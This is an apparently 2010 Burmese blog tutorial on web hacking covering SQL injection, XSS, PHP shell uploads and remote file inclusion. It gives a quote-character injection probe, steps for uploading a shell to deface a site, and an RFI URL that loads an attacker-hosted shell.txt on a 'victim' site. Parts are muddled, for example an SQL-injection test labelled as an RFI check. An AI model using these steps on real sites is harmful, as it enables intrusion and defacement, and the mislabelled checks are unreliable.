Thursday, September 9, 2010

Web Hacking...။

Web hacking နည္းပညာေတြဟာ တစ္ဘက္ကၾကည့္ရင္လည္း Website ကို ကာကြယ္ဖို႔အတြက္ ကူညီပါ လိမ့္မယ္။
(က)SQL Injection
( ခ ) XSS
( ဂ) Shells
(ဃ) RFI ……;
ေနာက္ထပ္အမ်ားၾကီး ရွိပါေသးတယ္။

(က) SQL Injection
Website အမ်ားစုဟာ SQL Database တစ္ခုနဲ႔ connect လုပ္ထားၾကပါတယ္။ SQL Databaseက သူတို႔ရဲ႕ Website သို႔ လာေရာက္လာပတ္သူက register လုပ္သြားတဲ႔အခါ Username နဲ႔ Password ေတြ (encrypt လုပ္ျပီး)ကို သိမ္းဆည္းထားဖို႔အတြက္ သူတို႔ကို ကူညီပါတယ္။ SQL database က user တစ္ေယာက္ logs in လုပ္တဲ႔ အခါတိုင္းမွာ ေမးခြန္းေတြေမးျမန္းတဲ႔ အလုပ္ငန္းစဥ္ကို လုပ္ေဆာင္ပါတယ္။ ၄င္းတို႔ database ဆီသြား ျပီး မွန္ကန္ေသခ်ာတဲ႔ password ဟုတ္မဟုတ္ ၾကည့္ပါတယ္။ အကယ္၍ မွန္ကန္တယ္ဆုိရင္ေတာ့ user ကို log in လိုက္ပါတယ္၊ မမွန္ဘူးဆိုရင္ေတာ့ error တစ္ခုကို ေပးပါလိမ့္မယ္။ ဒါေၾကာင့္ အေျခခံေဆာင္ရြက္ခ်က္ ကေတာ့ database မွာရွိတဲ႔ internet information ကုိ အသံုးခ်ဖို႔ၾကိဳးစားျပီး database ထဲမွာရွိတဲ႔ database ထဲမွာ ေမးခြန္းတစ္ခုကို စစ္ေဆးဖို႔ command တစ္ခုကို လိုက္နာေဆာင္ရြက္ေနျခင္းျဖစ္ပါတယ္။ ဒီနည္းလမ္း ဟာ website ကို hack ဖို႔အတြက္ နည္းလမ္းေတြထဲမွာ အရႈပ္ေထြး အခက္ခဲဆံုးနည္းလမ္းတစ္ခု ျဖစ္ပါတယ္။
Website မွာ RFI attach လုပ္ဖို႔ အားနည္းခ်က္ရွိလား မရွိလားဆိုတာကို သိခ်င္ရင္ ေအာက္ပါအတိုင္းျပဳ လုပ္ ပါ...။
အကယ္၍ Site ရဲ႕ URL က.... yoursite.com/index.php?id=545
ျဖစ္ေနတယ္ဆိုရင္ ၄င္းရဲ႕ အဆံုးမွာ ( ' ) ကို ေအာက္မွာ ျပထားသလိုမ်ိဳး ေပါင္းထည့္ေပးပါ...။

yoursite.com/index.php?id=545'

( ခ ) XSS
XSS ကေတာ့ အခ်ိဳ႕ Website ေတြကို hack ဖို႔အတြက္ ေကာင္းမြန္တဲ႔ အျခားနည္းလမ္းတစ္ခုလို႔ ဆိုႏိုင္ပါ တယ္။ အခ်ိဳ႕ Website/ forum ေတြက post ( သို႔ ) ေဆာင္းပါး ေတြထဲမွာ HTML ခြင့္ျပဳခဲ႔မယ္ဆိုရင္ hacker က content ထဲကို အႏၲရာယ္ရွိတဲ႔ script ေတြကို post လုပ္ႏိုင္ပါတယ္။ ဒါေၾကာင့္ ဘယ္အခ်ိန္မဆို user တစ္ေယာက္က page ကုိဖြင့္လိုက္တုိင္း cookieေတြက hacker ဆီကိုေပးပို႔ပါလိမ့္မယ္။ ဒီအတြက္ သူက user ကဲ႔သို႔ log in လုပ္ႏိုင္ျပီး website ကို #$%@# လုပ္ပါေတာ့တယ္။

( ဂ ) Shells
Shell ဆိုတာကေတာ့ အႏၲရာယ္ရွိတဲ႔ .php script ျဖစ္ပါတယ္။ ၄င္းကိုဘယ္လိုလုပ္ရမလဲ ဆိုေတာ့ avaters, recepie, tricks , feedbacks ကဲ႔သို႔ေသာ ဘယ္ဖိုင္မဆို upload လုပ္ႏိုင္တဲ႔ website တစ္ခုခုမွာ ေနရာတစ္ခု ရွာပါ။ ျပီးရင္ သင့္ရဲ႕ shell file ကို အဲဒီထဲကို upload လုပ္ႏိုင္ဖို႔ၾကိဳးစားပါ။ upload ျပီးသြားရင္ ၄င္းကို URL bar မွာဖြင့္ပါ။ အဲဒီ Webhosting ရဲ႕ FTP account တစ္ခုလံုးကို သင္ ျမင္ရပါလိမ့္မယ္။ index page ထဲဲမွာပါ ၀င္သမွ်ကို သင့္စိတ္ၾကိဳက္ rename/Edit/upload/download ၾကိဳက္သလိုလုပ္လို႔ရပါျပီ။ အခုလိုျပဳလုပ္ျခင္းကို deface လို႔လည္း ေခၚပါတယ္။


(ဃ) RFI
RFI ကလည္း Website တစ္ခုကို deface လုပ္ဖို႔အတြက္ ေကာင္းတဲ့နည္းလမ္းတစ္ခုပဲ ျဖစ္ပါတယ္။ ၄င္းကို shell နဲ႔အတူအသံုးျပဳရမွာ ျဖစ္ပါတယ္။ ၄င္းကို သင့္ရဲ႕ shell ေပၚမွာ upload လုပ္ျပီးျပီး ဆုိရင္ သင့္ကိုအ ေထာက္အကူေပးပါလိမ့္မယ္...။

yoursite.com/shell.txt
သင္က RFT သို႔ အားနည္းခ်က္ရွိတဲ႔ site တစ္ခုကို ရွာေတြ႔ရပါမယ္။ အဲဒီေနာက္ ေအာက္မွာျပထားတဲ႔ အတိုင္း ျပဳလုပ္ႏိုင္ပါတယ္။

victimssite.com/index.php?page=yousite.com/shell.txt

ဒီဟာက သင့္ကို သင့္သားေကာင္ရဲ႕ sites FTP ၀င္လမ္း ကုိ ထပ္ေပးပါလိမ့္မယ္။ shell မွာလိုပဲ သင္ၾကိဳက္ သလို သင့္စိတ္ၾကိဳက္ လုပ္လို႔ရပါျပီ။ အကယ္၍သင္ကသင့္ website က RFI attach လုပ္ဖို႔ အားနည္းခ်က္ ရွိလား မရွိဘူးလားဆိုတာကို စစ္ေဆးခ်င္ရင္ ေအာက္ပါအတိုင္း လုပ္ပါ...။
အကယ္၍ သင့္ site ရဲ႕ URL က

yoursite.com/index.php?id=545

ျဖစ္ေနခဲ႔ရင္ ၄င္းရဲ႕ အဆံုးမွာ ေအာက္မွာျပထားတဲ႔ အတိုင္း ေပါင္းထည့္ေပးပါ...။

yoursite.com/index.php?id=http://www.google.com
အကယ္၍ သင့္ page ထဲမွာ google page ပါ၀င္ေနမယ္ဆိုရင္ေတာ့ အဲဒီအဓိပၸာယ္က RFI သို႔ တြဲဆက္ျခင္း မွာ ေပ်ာ့ကြက္တစ္ခုျဖစ္ပါတယ္။

No comments: